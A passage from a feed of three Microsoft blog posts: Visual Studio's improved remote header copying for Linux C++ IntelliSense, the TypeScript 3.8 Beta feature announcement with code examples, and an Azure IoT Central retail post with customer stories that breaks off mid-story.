Accurate C++ IntelliSense requires access to the C++ headers that are referenced by C++ source files. For Linux scenarios the headers referenced by a Linux MSBuild or CMake project are copied to Windows by Visual Studio from the Linux device (or VM, or Docker container, or WSL system) being targeted for the build. Visual Studio then uses these headers to provide IntelliSense. If the headers are not the correct versions, for example they are gcc headers rather than clang headers, or C++11 headers rather than C++17 headers, then the IntelliSense may be incorrect, which can be very confusing to the user. Also, for some scenarios the number of headers can be very large and so the copy can take a long time. Visual Studio 2019 version 16.5 Preview 1 improves both the accuracy and the performance of the header copy, providing better IntelliSense for Linux projects.

Remote Connections

When making a new remote connection using the Visual Studio connection manager the old default behavior was to copy the headers from the remote Linux target to a local Windows cache location immediately after adding the connection. This is no longer done or necessary. Headers are now copied on demand when opening a Linux project or configuring CMake for a Linux target. The copy now occurs in the background.

The Connection Manager for remote Linux projects in Visual Studio.

The connection manager’s remote headers dialog has also changed. Caching for each connection can be explicitly enabled or disabled. The default for a new connection is to be enabled. The user may also select a connection and:

  • Press the Update button to download the headers for the connection on demand.
  • Press the Delete button to delete the header cache for the connection.
  • Press the Explore button to open the connection’s cache location in the file browser.

Linux Project Properties

There are three new Linux project properties to help the user control header copying: Remote Copy Include Directories, Remote Copy Exclude Directories, and IntelliSense Uses Compiler Defaults.

New configuration properties for a C++ Linux project including Remote Copy Include Directories, Remote Copy Exclude Directories, and IntelliSense Use Compiler Defaults

  • Remote Copy Include Directories: a list of directories to copy (recursively) from the Linux target. This property affects the remote header copy for IntelliSense but not the build. It can be used when “IntelliSense Uses Compiler Defaults” is set to false. Use Additional Include Directories under the C/C++ General tab to specify additional include directories to be used for both IntelliSense and build.
  • Remote Copy Exclude Directories: a list of directories NOT to copy. Usually this is used to remove subdirectories of the include directories. For example, suppose /usr/include was to be copied. The copy would also contain /usr/include/boost if it were present. However, if the current project does not reference boost then copying it is a waste of time and space. Adding /usr/include/boost to the excluded list avoids the unnecessary copy.
  • IntelliSense Uses Compiler Defaults: a Boolean value indicating whether the compiler referenced by this project (see below) should be queried for its default list of include locations. These are automatically added to the list of remote directories to copy. This property should only be set to false if the compiler does not support gcc-like parameters. Both gcc and clang compiler sets support querying for the include directories (e.g. “g++ -x c++ -E -v -std=c++11”); an example of what that query returns follows this list.
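
For reference, here is roughly what that query looks like when run by hand on a Linux target. The interesting part of the (stderr) output is the include search list; the directories shown below are illustrative and will vary by distro and compiler version:

$ g++ -x c++ -E -v -std=c++11 - < /dev/null
...
#include <...> search starts here:
 /usr/include/c++/7
 /usr/include/x86_64-linux-gnu/c++/7
 /usr/local/include
 /usr/include
End of search list.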

Other C++ project properties also affect header copying:

  • C/C++ General tab: Additional Include Directories, C Compiler and C++ Compiler.
  • C/C++ Language tab: C Language Standard and C++ Language Standard

Additional C++ properties for Linux projects that affect header copying under the C/C++ General Tab

The paths found in the Additional Include Directories list are used for both IntelliSense and build. The (non-project) paths in that list are automatically added to the list of directories to copy. The compilers are normally filled out automatically by the selection of Platform Toolset in the General tab. However, in some cases a more precise specification of the compiler is necessary, for example specifying “clang8” when “clang” binds to clang version 6 on the Linux target. The compiler configured here is queried for its default include directory list. The C Language Standard and C++ Language Standard selected are passed as parameters to the compiler (e.g. -std=c++11) when it is queried. In the past, all headers for both gcc and clang were copied to the local cache. By making use of the compiler and standard selected in the project properties, Visual Studio can identify exactly those headers that are necessary for the project and thus avoid copying unnecessary headers.

Properties for the C/C++ Language Standard in Property Pages for C++ Linux Projects

CMake Project Properties

CMake projects have similar settings to control headers copying under the “Advanced Settings” section of the CMake Settings Editor:

CMake Properties to manipulate the remote header copy in the "Advanced" section of the CMake Settings Editor

The paths in the list of remote include directories can be formatted with environment variables and ‘~’, for example: “/usr/include/clang8;$HOME/include;~/myinclude”. For CMake projects the compiler name and language standard are retrieved from the CMake cache. The values of CMAKE_C_COMPILER (and CMAKE_CXX_COMPILER) are used to identify the compiler to query. The C_STANDARD (CXX_STANDARD) properties are used to identify the standard in effect.

Copying the Headers

The set of directories to be copied is computed each time a project is opened or one of the project properties described above is modified.

In cases where the remote target is updated independently, for example a new version of gcc is installed, then Visual Studio’s cache will be out-of-date with respect to that target. Visual Studio will not detect that the remote headers have changed. In this case the user must request a cache scan by selecting Project > Scan Solution from the main Visual Studio menu, which will cause the directories to be sync’d with the remote target even if they had been previously copied.

Give us your feedback

Do you have feedback on our Linux tooling or CMake support in Visual Studio? We’d love to hear from you to help us prioritize and build the right features for you. We can be reached via the comments below, Developer Community, email (visualcpp@microsoft.com), and Twitter (@VisualC). The best way to suggest new features or file bugs is via Developer Community.

The post Improvements to Accuracy and Performance of Linux IntelliSense appeared first on C++ Team Blog.

Announcing TypeScript 3.8 Beta


Today we’re announcing the availability of TypeScript 3.8 Beta! This Beta release contains all the new features you should expect from TypeScript 3.8’s final release.

To get started using the beta, you can get it through NuGet, or through npm with the following command:

npm install typescript@beta

You can also get editor support for the beta in Visual Studio and Visual Studio Code.

TypeScript 3.8 brings a lot of new features, including new or upcoming ECMAScript standards features, new syntax for importing/exporting only types, and more.

Type-Only Imports and Exports

TypeScript reuses JavaScript’s import syntax in order to let us reference types. For instance, in the following example, we’re able to import doThing which is a JavaScript value along with Options which is purely a TypeScript type.

// ./foo.ts
interface Options {
    // ...
}

export function doThing(options: Options) {
    // ...
}

// ./bar.ts
import { doThing, Options } from "./foo.js";

function doThingBetter(options: Options) {
    // do something twice as good
    doThing(options);
    doThing(options);
}

This is convenient because most of the time we don’t have to worry about what’s being imported – just that we’re importing something.

Unfortunately, this only worked because of a feature called import elision. When TypeScript outputs JavaScript files, it sees that Options is only used as a type, and it automatically drops its import. The resulting output looks kind of like this:

// ./foo.js
export function doThing(options) {
    // ...
}

// ./bar.js
import { doThing } from "./foo.js";

function doThingBetter(options: Options) {
    // do something twice as good
    doThing(options);
    doThing(options);
}

Again, this behavior is usually great, but it causes some other problems.

First of all, there are some places where it’s ambiguous whether a value or a type is being exported. For example, in the following example is MyThing a value or a type?

import { MyThing } from "./some-module.js";

export { MyThing };

Limiting ourselves to just this file, there’s no way to know. Both Babel and TypeScript’s transpileModule API will emit code that doesn’t work correctly if MyThing is only a type, and TypeScript’s isolatedModules flag will warn us that it’ll be a problem. The real problem here is that there’s no way to say “no, no, I really only meant the type – this should be erased”, so import elision isn’t good enough.

The other issue was that TypeScript’s import elision would get rid of import statements that only contained imports used as types. That caused observably different behavior for modules that have side-effects, and so users would have to insert a second import statement purely to ensure side-effects.

// This statement will get erased because of import elision.
import { SomeTypeFoo, SomeOtherTypeBar } from "./module-with-side-effects";

// This statement always sticks around.
import "./module-with-side-effects";

A concrete place where we saw this coming up was in frameworks like Angular.js (1.x) where services needed to be registered globally (which is a side-effect), but where those services were only imported for types.

// ./service.ts
export class Service {
    // ...
}
register("globalServiceId", Service);

// ./consumer.ts
import { Service } from "./service.js";

inject("globalServiceId", function (service: Service) {
    // do stuff with Service
});

As a result, ./service.js will never get run, and things will break at runtime.

To avoid this class of issues, we realized we needed to give users more fine-grained control over how things were getting imported/elided.

As a solution in TypeScript 3.8, we’ve added a new syntax for type-only imports and exports.

import type { SomeThing } from "./some-module.js";

export type { SomeThing };

import type only imports declarations to be used for type annotations and declarations. It always gets fully erased, so there’s no remnant of it at runtime. Similarly, export type only provides an export that can be used for type contexts, and is also erased from TypeScript’s output.

It’s important to note that classes have a value at runtime and a type at design-time, and the use is very context-sensitive. When using import type to import a class, you can’t do things like extend from it.

import type { Component } from "react";

interface ButtonProps {
    // ...
}

class Button extends Component<ButtonProps> {
    //               ~~~~~~~~~
    // error! 'Component' only refers to a type, but is being used as a value here.

    // ...
}

If you’ve used Flow before, the syntax is fairly similar. One difference is that we’ve added a few restrictions to avoid code that might appear ambiguous.

// Is only 'Foo' a type? Or every declaration in the import?
// We just give an error because it's not clear.

import type Foo, { Bar, Baz } from "some-module";
//     ~~~~~~~~~~~~~~~~~~~~~~
// error! A type-only import can specify a default import or named bindings, but not both.

In conjunction with import type, we’ve also added a new compiler flag to control what happens with imports that won’t be utilized at runtime: importsNotUsedAsValues. At this point the name is tentative, but this flag takes 3 different options:

  • remove: this is today’s behavior of dropping these imports. It’s going to continue to be the default, and is a non-breaking change.
  • preserve: this preserves all imports whose values are never used. This can cause imports/side-effects to be preserved.
  • error: this preserves all imports (the same as the preserve option), but will error when a value import is only used as a type. This might be useful if you want to ensure no values are being accidentally imported, but still make side-effect imports explicit.
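
For instance, opting into the strictest behavior in a tsconfig.json might look like this sketch (using the tentative flag name above):

{
    "compilerOptions": {
        "importsNotUsedAsValues": "error"
    }
}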

For more information about the feature, you can take a look at the pull request.

Type-Only vs Erased

There is a final note about this feature. In TypeScript 3.8 Beta, only the type meaning of a declaration will be imported by import type. That means that you can’t use values even if they’re purely used for type positions (like in the extends clause of a class declared with the declare modifier, and the typeof type operator).

import type { Base } from "my-library";

let baseConstructor: typeof Base;
//                          ~~~~
// error! 'Base' only refers to a type, but is being used as a value here.

declare class Derived extends Base {
    //                        ~~~~
    // error! 'Base' only refers to a type, but is being used as a value here.
}

We’re looking at changing this behavior based on recent feedback. Instead of only importing the type side of declarations, we’re planning on changing the meaning of import type to mean “import whatever this is, but only allow it in type positions.” In other words, things imported using import type can only be used in places where it won’t affect surrounding JavaScript code.

While this behavior is not in the beta, you can expect it in our upcoming release candidate, and keep track of that work on its respective pull request.

ECMAScript Private Fields

TypeScript 3.8 brings support for ECMAScript’s private fields, part of the stage-3 class fields proposal. This work was started and driven to completion by our good friends at Bloomberg!

class Person {
    #name: string
    
    constructor(name: string) {
        this.#name = name;
    }

    greet() {
        console.log(`Hello, my name is ${this.#name}!`);
    }
}

let jeremy = new Person("Jeremy Bearimy");

jeremy.#name
//     ~~~~~
// Property '#name' is not accessible outside class 'Person'
// because it has a private identifier.

Unlike regular properties (even ones declared with the private modifier), private fields have a few rules to keep in mind. Some of them are:

  • Private fields start with a # character. Sometimes we call these private names.
  • Every private field name is uniquely scoped to its containing class.
  • TypeScript accessibility modifiers like public or private can’t be used on private fields.
  • Private fields can’t be accessed or even detected outside of the containing class – even by JS users! Sometimes we call this hard privacy.

Apart from “hard” privacy, another benefit of private fields is that uniqueness we just mentioned. For example, regular property declarations are prone to being overwritten in subclasses.

class C {
    foo = 10;

    cHelper() {
        return this.foo;
    }
}

class D extends C {
    foo = 20;

    dHelper() {
        return this.foo;
    }
}

let instance = new D();
// 'this.foo' refers to the same property on each instance.
console.log(instance.cHelper()); // prints '20'
console.log(instance.dHelper()); // prints '20'

With private fields, you’ll never have to worry about this, since each field name is unique to the containing class.

class C {
    #foo = 10;

    cHelper() {
        return this.#foo;
    }
}

class D extends C {
    #foo = 20;

    dHelper() {
        return this.#foo;
    }
}

let instance = new D();
// 'this.#foo' refers to a different field within each class.
console.log(instance.cHelper()); // prints '10'
console.log(instance.dHelper()); // prints '20'

Another thing worth noting is that accessing a private field on any other type will result in a TypeError!

class Square {
    #sideLength: number;
    
    constructor(sideLength: number) {
        this.#sideLength = sideLength;
    }

    equals(other: any) {
        return this.#sideLength === other.#sideLength;
    }
}

const a = new Square(100);
const b = { sideLength: 100 };

// Boom!
// TypeError: attempted to get private field on non-instance
// This fails because 'b' is not an instance of 'Square'.
console.log(a.equals(b));
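
If equals needs to tolerate arbitrary inputs, one way to avoid that runtime TypeError is to check the argument before touching its private field. A small sketch:

class Square {
    #sideLength: number;

    constructor(sideLength: number) {
        this.#sideLength = sideLength;
    }

    equals(other: any) {
        // Only touch '#sideLength' once we know 'other' really is a 'Square'.
        return other instanceof Square &&
            this.#sideLength === other.#sideLength;
    }
}

// prints 'false' instead of throwing
console.log(new Square(100).equals({ sideLength: 100 }));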

Finally, for anyone using plain .js files, note that private fields always have to be declared before they’re assigned to.

class C {
    // No declaration for '#foo'
    // :(

    constructor(foo) {
        // SyntaxError!
        // '#foo' needs to be declared before writing to it.
        this.#foo = foo;
    }
}

JavaScript has always allowed users to access undeclared properties, whereas TypeScript has always required declarations for class properties. With private fields, declarations are always needed regardless of whether we’re working in .js or .ts files.

class C {
    /** @type {number} */
    #foo;

    constructor(foo) {
        // This works.
        this.#foo = foo;
    }
}

For more information about the implementation, you can check out the original pull request.

Which should I use?

We’ve already received many questions on which type of privates you should use as a TypeScript user: most commonly, “should I use the private keyword, or ECMAScript’s hash/pound (#) private fields?”

Like all good questions, the answer is not so simple: it depends!

When it comes to properties, TypeScript’s private modifiers are fully erased – that means that while the data will be there, nothing is encoded in your JavaScript output about how the property was declared. At runtime, it acts entirely like a normal property. That means that when using the private keyword, privacy is only enforced at compile-time/design-time, and for JavaScript consumers, it’s entirely intent-based.

class C {
    private foo = 10;
}

// This is an error at compile time,
// but when TypeScript outputs .js files,
// it'll run fine and print '10'.
console.log(new C().foo);    // prints '10'
//                  ~~~
// error! Property 'foo' is private and only accessible within class 'C'.

// TypeScript allows this at compile-time
// as a "work-around" to avoid the error.
console.log(new C()["foo"]); // prints '10'

The upside is that this sort of “soft privacy” can help your consumers temporarily work around not having access to some API, and works in any runtime.

On the other hand, ECMAScript’s # privates are completely inaccessible outside of the class.

class C {
    #foo = 10;
}

console.log(new C().#foo); // SyntaxError
//                  ~~~~
// TypeScript reports an error *and*
// this won't work at runtime!

console.log(new C()["#foo"]); // prints undefined
//          ~~~~~~~~~~~~~~~
// TypeScript reports an error under 'noImplicitAny',
// and this prints 'undefined'.

This hard privacy is really useful for strictly ensuring that nobody can make use of any of your internals. If you’re a library author, removing or renaming a private field should never cause a breaking change.

As we mentioned, another benefit is that subclassing can be easier with ECMAScript’s # privates because they really are private. When using ECMAScript # private fields, no subclass ever has to worry about collisions in field naming. When it comes to TypeScript’s private property declarations, users still have to be careful not to trample over properties declared in superclasses.

Finally, something to consider is where you intend for your code to run. TypeScript currently can’t support this feature unless targeting ECMAScript 2015 (ES6) targets or higher. This is because our downleveled implementation uses WeakMaps to enforce privacy, and WeakMaps can’t be polyfilled in a way that doesn’t cause memory leaks. In contrast, TypeScript’s private-declared properties work with all targets – even ECMAScript 3!
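
To give a sense of why that is, here’s a heavily simplified sketch of the WeakMap approach; the helpers TypeScript actually emits look different, but the idea is the same:

// One WeakMap per private field, keyed by instance. Entries go away when
// instances are garbage collected, which is why a plain Map or object
// can't stand in for a WeakMap without leaking memory.
var _name = new WeakMap();

class Person {
    constructor(name) {
        _name.set(this, name);
    }

    greet() {
        console.log(`Hello, my name is ${_name.get(this)}!`);
    }
}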

Kudos!

It’s worth reiterating how much work went into this feature from our contributors at Bloomberg. They were diligent in taking the time to learn to contribute features to the compiler/language service, and paid close attention to the ECMAScript specification to test that the feature was implemented in a compliant manner. They even improved another 3rd party project, CLA Assistant, which made contributing to TypeScript even easier.

We’d like to extend a special thanks to:

export * as ns Syntax

It’s common to have a single entry-point that exposes all the members of another module as a single member.

import * as utilities from "./utilities.js";
export { utilities };

This is so common that ECMAScript 2020 recently added a new syntax to support this pattern!

export * as utilities from "./utilities.js";

This is a nice quality-of-life improvement to JavaScript, and TypeScript 3.8 implements this syntax. When your module target is earlier than es2020, TypeScript will output something along the lines of the first code snippet.
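
From the consuming side nothing changes; the re-exported namespace is just another named export (the file and function names here are hypothetical):

import { utilities } from "./index.js";

utilities.doSomething();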

Special thanks to community member Wenlu Wang (Kingwl) who implemented this feature! For more information, check out the original pull request.

Top-Level await

Most modern environments that provide I/O in JavaScript (like HTTP requests) do so asynchronously, and many modern APIs return Promises. While this has a lot of benefits in making operations non-blocking, it makes certain things like loading files or external content surprisingly tedious.

fetch("...")
    .then(response => response.text())
    .then(greeting => { console.log(greeting) });

To avoid .then chains with Promises, JavaScript users often introduced an async function in order to use await, and then immediately called the function after defining it.

async function main() {
    const response = await fetch("...");
    const greeting = await response.text();
    console.log(greeting);
}

main()
    .catch(e => console.error(e))

To avoid introducing an async function, we can use a handy upcoming ECMAScript feature called “top-level await”.

Previously in JavaScript (along with most other languages with a similar feature), await was only allowed within the body of an async function. However, with top-level await, we can use await at the top level of a module.

const response = await fetch("...");
const greeting = await response.text();
console.log(greeting);

// Make sure we're a module
export {};

Note there’s a subtlety: top-level await only works at the top level of a module, and files are only considered modules when TypeScript finds an import or an export. In some basic cases, you might need to write out export {} as some boilerplate to make sure of this.

Top-level await may not work in all environments where you might expect at this point. Currently, you can only use top-level await when the target compiler option is es2017 or above, and module is esnext or system. Support within several environments and bundlers may be limited or may require enabling experimental support.
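
For example, a minimal tsconfig.json that satisfies those constraints looks something like this:

{
    "compilerOptions": {
        "target": "es2017",
        "module": "esnext"
    }
}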

For more information on our implementation, you can check out the original pull request.

es2020 for target and module

Thanks to Kagami Sascha Rosylight (saschanaz), TypeScript 3.8 supports es2020 as an option for module and target. This will preserve newer ECMAScript 2020 features like optional chaining, nullish coalescing, export * as ns, and dynamic import(...) syntax. It also means bigint literals now have a stable target below esnext.
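
As a small, hypothetical example, compiling with "target": "es2020" leaves syntax like this alone instead of rewriting it for older runtimes:

interface Options {
    retries?: number;
}

declare const options: Options | undefined;

// Optional chaining, nullish coalescing, and bigint literals are all
// preserved as-is in the emitted JavaScript under es2020.
const retryCount = options?.retries ?? 3;
const big = 9007199254740993n;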

JSDoc Property Modifiers

TypeScript 3.8 supports JavaScript files by turning on the allowJs flag, and also supports type-checking those JavaScript files via the checkJs option or by adding a // @ts-check comment to the top of your .js files.

Because JavaScript files don’t have dedicated syntax for type-checking, TypeScript leverages JSDoc. TypeScript 3.8 understands a few new JSDoc tags for properties.

First are the accessibility modifiers: @public, @private, and @protected. These tags work exactly like public, private, and protected respectively work in TypeScript.

// @ts-check

class Foo {
    constructor() {
        /** @private */
        this.stuff = 100;
    }

    printStuff() {
        console.log(this.stuff);
    }
}

new Foo().stuff;
//        ~~~~~
// error! Property 'stuff' is private and only accessible within class 'Foo'.

  • @public is always implied and can be left off, but means that a property can be reached from anywhere.
  • @private means that a property can only be used within the containing class.
  • @protected means that a property can only be used within the containing class, and all derived subclasses, but not on dissimilar instances of the containing class.
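
For instance, @protected behaves like this (the class names here are made up):

// @ts-check

class Animal {
    constructor() {
        /** @protected */
        this.legs = 4;
    }
}

class Dog extends Animal {
    describe() {
        // OK: 'legs' is accessible from a subclass.
        return `A dog with ${this.legs} legs`;
    }
}

new Animal().legs;
//          ~~~~
// error! Property 'legs' is protected and only accessible within
// class 'Animal' and its subclasses.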

Next, we’ve also added the @readonly modifier to ensure that a property is only ever written to during initialization.

// @ts-check

class Foo {
    constructor() {
        /** @readonly */
        this.stuff = 100;
    }

    writeToStuff() {
        this.stuff = 200;
        //   ~~~~~
        // Cannot assign to 'stuff' because it is a read-only property.
    }
}

new Foo().stuff++;
//        ~~~~~
// Cannot assign to 'stuff' because it is a read-only property.

watchOptions

TypeScript has strived to provide reliable file-watching capabilities in --watch mode and in editors for years. While it’s worked well for the most part, it turns out that file-watching in Node.js is hard, and its drawbacks can be reflected in our logic. The built-in APIs in Node.js are either CPU/energy-intensive and inaccurate (fs.watchFile) or they’re wildly inconsistent across platforms (fs.watch). Additionally, it’s practically impossible to determine which API will work better because it depends not only on the platform, but the file system on which a file resides.

This has been a struggle, because TypeScript needs to run on more platforms than just Node.js, and also strives to avoid dependencies so that it stays entirely self-contained. This especially applies to dependencies on native Node.js modules.

Because every project might work better under different strategies, TypeScript 3.8 introduces a new watchOptions field in tsconfig.json and jsconfig.json which allows users to tell the compiler/language service which watching strategies should be used to keep track of files and directories.

{
    // Some typical compiler options
    "compilerOptions": {
        "target": "es2020",
        "moduleResolution": "node",
        // ...
    },

    // NEW: Options for file/directory watching
    "watchOptions": {
        // Use native file system events for files and directories
        "watchFile": "useFsEvents",
        "watchDirectory": "useFsEvents",

        // Poll files for updates more frequently
        // when they're updated a lot.
        "fallbackPolling": "dynamicPriority"
    }
}

watchOptions contains 4 new options that can be configured:

  • watchFile: the strategy for how individual files are watched. This can be set to
    • fixedPollingInterval: Check every file for changes several times a second at a fixed interval.
    • priorityPollingInterval: Check every file for changes several times a second, but use heuristics to check certain types of files less frequently than others.
    • dynamicPriorityPolling: Use a dynamic queue where less-frequently modified files will be checked less often.
    • useFsEvents (the default): Attempt to use the operating system/file system’s native events for file changes.
    • useFsEventsOnParentDirectory: Attempt to use the operating system/file system’s native events to listen for changes on a file’s containing directories. This can use fewer file watchers, but might be less accurate.
  • watchDirectory: the strategy for how entire directory trees are watched under systems that lack recursive file-watching functionality. This can be set to:
    • fixedPollingInterval: Check every directory for changes several times a second at a fixed interval.
    • dynamicPriorityPolling: Use a dynamic queue where less-frequently modified directories will be checked less often.
    • useFsEvents (the default): Attempt to use the operating system/file system’s native events for directory changes.
  • fallbackPolling: when using file system events, this option specifies the polling strategy that gets used when the system runs out of native file watchers and/or doesn’t support native file watchers. This can be set to
    • fixedPollingInterval: (See above.)
    • priorityPollingInterval: (See above.)
    • dynamicPriorityPolling: (See above.)
  • synchronousWatchDirectory: Disable deferred watching on directories. Deferred watching is useful when lots of file changes might occur at once (e.g. a change in node_modules from running npm install), but you might want to disable it with this flag for some less-common setups.

For more information on watchOptions, head over to GitHub to see the pull request.

“Fast and Loose” Incremental Checking

TypeScript’s --watch mode and --incremental mode can help tighten the feedback loop for projects. Turning on --incremental mode makes TypeScript keep track of which files can affect others, and on top of doing that, --watch mode keeps the compiler process open and reuses as much information in memory as possible.

However, for much larger projects, even the dramatic gains in speed that these options afford us aren’t enough. For example, the Visual Studio Code team had built their own build tool around TypeScript called gulp-tsb, which would be less accurate in assessing which files needed to be rechecked/rebuilt in its watch mode, and as a result, could provide drastically lower build times.

Sacrificing accuracy for build speed, for better or worse, is a tradeoff many are willing to make in the TypeScript/JavaScript world. Lots of users prioritize tightening their iteration time over addressing the errors up-front. As an example, it’s fairly common to build code regardless of the results of type-checking or linting.

TypeScript 3.8 introduces a new compiler option called assumeChangesOnlyAffectDirectDependencies. When this option is enabled, TypeScript will avoid rechecking/rebuilding all truly possibly-affected files, and only recheck/rebuild files that have changed as well as files that directly import them.

For example, consider a file fileD.ts that imports fileC.ts that imports fileB.ts that imports fileA.ts as follows:

fileA.ts <- fileB.ts <- fileC.ts <- fileD.ts

In --watch mode, a change in fileA.ts would typically mean that TypeScript would need to at least re-check fileB.ts, fileC.ts, and fileD.ts. Under assumeChangesOnlyAffectDirectDependencies, a change in fileA.ts means that only fileA.ts and fileB.ts need to be re-checked.

In a codebase like Visual Studio Code, this reduced rebuild times for changes in certain files from about 14 seconds to about 1 second. While we don’t necessarily recommend this option for all codebases, you might be interested if you have an extremely large codebase and are willing to defer full project errors until later (e.g. a dedicated build via a tsconfig.fullbuild.json or in CI).
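
If you do want to opt in, a minimal sketch of the relevant compiler options looks like this:

{
    "compilerOptions": {
        "incremental": true,
        "assumeChangesOnlyAffectDirectDependencies": true
    }
}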

For more details, you can see the original pull request.

Breaking Changes

TypeScript 3.8 contains a few minor breaking changes that should be noted.

Stricter Assignability Checks to Unions with Index Signatures

Previously, excess properties were unchecked when assigning to unions where any type had an index signature – even if that excess property could never satisfy that index signature. In TypeScript 3.8, the type-checker is stricter, and only “exempts” properties from excess property checks if that property could plausibly satisfy an index signature.

let obj1: { [x: string]: number } | { a: number };

obj1 = { a: 5, c: 'abc' }
//             ~
// Error!
// The type '{ [x: string]: number }' no longer exempts 'c'
// from excess property checks on '{ a: number }'.

let obj2: { [x: string]: number } | { [x: number]: number };

obj2 = { a: 'abc' };
//       ~
// Error!
// The types '{ [x: string]: number }' and '{ [x: number]: number }' no longer exempt 'a'
// from excess property checks against '{ [x: number]: number }',
// and it *is* sort of an excess property because 'a' isn't a numeric property name.
// This one is more subtle.

object in JSDoc is No Longer any Under noImplicitAny

Historically, TypeScript’s support for checking JavaScript has been lax in certain ways in order to provide an approachable experience.

For example, because users often used Object in JSDoc to mean “some object, I dunno what”, we’ve treated it as any.

// @ts-check

/**
 * @param thing {Object} some object, i dunno what
 */
function doSomething(thing) {
    let x = thing.x;
    let y = thing.y;
    thing();
}

This is because treating it as TypeScript’s Object type would end up in code reporting uninteresting errors, since the Object type is an extremely vague type with few capabilities other than methods like toString and valueOf.

However, TypeScript does have a more useful type named object (notice that lowercase o). The object type is more restrictive than Object, in that it rejects all primitive types like string, boolean, and number. Unfortunately, both Object and object were treated as any in JSDoc.

Because object can come in handy and is used significantly less than Object in JSDoc, we’ve removed the special-case behavior in JavaScript files when using noImplicitAny so that in JSDoc, the object type really refers to the non-primitive object type.
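
Concretely, under noImplicitAny a checked JavaScript file now behaves along these lines (the function, parameter, and property names are made up):

// @ts-check

/**
 * @param {object} settings some non-primitive object
 */
function configure(settings) {
    settings.toString();  // still fine: methods from Object.prototype exist on 'object'

    settings.retries;
    //       ~~~~~~~
    // error! Property 'retries' does not exist on type 'object'.
}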

What’s Next?

Now that the beta is out, our team has been focusing largely on bug fixes and polish for what will eventually become TypeScript 3.8. As you can see on our current Iteration Plan, we’ll have one release candidate (a pre-release) in a couple of weeks, followed by a full release around mid-February. As editor features we’ve developed become more mature, we’ll also show off functionality like Call Hierarchy and the “convert to template string” refactoring.

If you’re able to give our beta a try, we would highly appreciate your feedback! So download it today, and happy hacking!

– Daniel Rosenwasser and the TypeScript Team

The post Announcing TypeScript 3.8 Beta appeared first on TypeScript.

Retailers embrace Azure IoT Central


For many retailers around the world, the busiest quarter of the year just finished with holiday shopping through Black Friday and Cyber Monday to Boxing Day. From supply chain optimization, to digital distribution, and in-store analytics, the retail industry has wholeheartedly embraced IoT technology to support those spikes in demand; particularly in scenarios where brands need to build flexibility, hire strong talent, and optimize the customer experience in order to build brand loyalty. In our latest IoT Signals for Retail research, commissioned by Microsoft and released January 2020, we explore the top insights from leaders who are using IoT today. We discuss growth areas such as improving the customer experience, the use of artificial intelligence to achieve break-through success, and nuances between global markets around security concerns and compliance.

Building retail IoT solutions with Azure IoT Central

As Microsoft and its global partners continue to turn retail insights into solutions that empower retailers around the world, a key question continues to face decision makers about IoT investments: whether to build a solution from scratch, or buy a solution that fits their needs. For many solution builders, Azure IoT Central is the perfect fit, a fully managed IoT platform with predictable pricing and unique features like retail-specific application templates that can accelerate solution development thanks to the inclusion of over 30 underlying Azure services. Let us manage the services so you can focus on what’s more important: applying your deep industry knowledge to help your customers.

New tools to accelerate building a retail IoT Solution

Today we are excited to announce the addition of our sixth IoT Central retail application template for solution builders. The Micro-fulfillment center template showcases how connectivity and automation can reduce cost by eliminating downtime, increasing security, and improving efficiency. App templates can help solution builders get started quickly and include sample operator dashboards, sample device templates, simulated devices producing real-time data, access to Plug and Play devices, and security features that give you peace of mind. Fulfillment optimization is a cornerstone of operations for many retailers, and optimizing early may offer significant returns in the future. Application templates are helping solution builders overcome challenges like getting past the proof-of-concept phase, or building rapid business cases for new IoT scenarios.

IoT Central Retail Application Templates for solution builders: 6 IoT Central retail application templates designed to accelerate solution development.

Innovative Retailers share their IoT stories

In addition to rich industry insights like those found in IoT Signals for Retail, we are proudly releasing three case stories detailing decisions, trade-offs, processes, and results from top global brands investing in IoT solutions, and the retail solution builders supporting them. Read more about how these companies are implementing and winning with their IoT investments and uncover details that might offer you an edge as you navigate your own investments and opportunities.

South Africa Breweries and CIRT team up to solve a cooler tracking conundrum

South Africa Breweries, a subsidiary of AB InBev, the world’s largest brewing company, is committed to keeping its product fresh and cold for customers, a challenge that most consumers take for granted. From tracking missing coolers to reducing costs and achieving sustainability goals, Sameer Jooma, Director of Innovation and Analytics for AB InBev, turned to IoT innovation led by Consumption Information Real Time (CIRT), a South African solution builder. CIRT was tasked to pilot Fridgeloc Connected Cooler, a cooler monitoring system, providing real-time insight into the temperature (both internal cooler and condenser), connected state, and location of hundreds of coolers across urban and rural South Africa. Revamping an existing cooler audit process that involved auditors visiting dealer locations to verify that a cooler was in the right place, and tracking the time between delivery and installation to an outlet, are just two of the process optimization benefits found by Jooma.

“The management team wanted to have a view of the coolers, and to be able to manage them centrally at a national level. IoT Central enabled us to gain that live view.” - Sameer Jooma, Director: Innovation and Analytics, AB InBev.

Learn more about the universal cooler challenges that face merchants and consumer packaged goods companies worldwide in the case story.

On the “road” to a connected cooler in rural South Africa, a field technician gets stuck in the sand on his way to the tavern.

Fridgeloc Connected Cooler at a tavern in Soweto, South Africa.

Mars Incorporated Halloween display campaign unveils new insights thanks to Footmarks Inc.

For most consumer packaged goods companies, sales spike during holiday times thanks to investments across the marketing and sales mix, from online display advertising to in-store physical displays. This past Halloween, Jason Wood, Global Display Development Head, Mars Inc., a global manufacturer of confectionery and other food products, decided it was time to gain deeper insights into an age-old problem of tracking where their product displays went after they left the warehouse. Previously, Mars was only able to track the number of displays it produced, and how many left its warehouses for retailer destinations. They found the right partner in Footmarks Inc., which designed its beacon- and gateway-based display tracking solution with Azure IoT Central to deliver secure, simple, and scalable insights into what happens once displays begin transit. Several interesting insights emerged throughout the campaign and afterward.

"Information on when displays came off the floor were surprising—major insights that we wouldn't have been able to get to without the solution." - Jason Wood, Global Display Development Head, Mars Inc.

Learn more about challenges Mars and Footmarks faced scaling, pricing, and managing devices for display tracking in the case story.

Footmarks Inc. Smart Connect Cloud dashboard for Mars Wrigley showing the display tracking solution using IoT sensors for the 2019 Halloween campaign.

Microsoft turns to C.H. Robinson and Intel for Xbox and Surface supply chain visibility

In advance of the busy 2019 holiday season and the introduction of many new Surface SKUs, the Microsoft supply chain team was interested in testing the benefits of a single platform connecting IoT devices on shipments globally, streamlining analytics and device management. This Microsoft team was also thinking ahead, preparing for the launch of the latest Xbox console, Xbox Series X, and for a series of new Surface product launches. With Surface and Xbox demand projected to grow around the world, the need for insights and appropriate actions along the supply chain was only going to increase. The Microsoft team partnered with TMC (a division of C.H. Robinson), a global technology and logistics management provider that partnered with Intel, to design a transformative solution based on their existing Navisphere Vision software that could be deployed globally using Azure IoT Central. The goal was to track and monitor shipments’ ambient conditions for shock, light, and temperature to identify any damage in real time, anywhere in the world—at a scale covering millions of products.

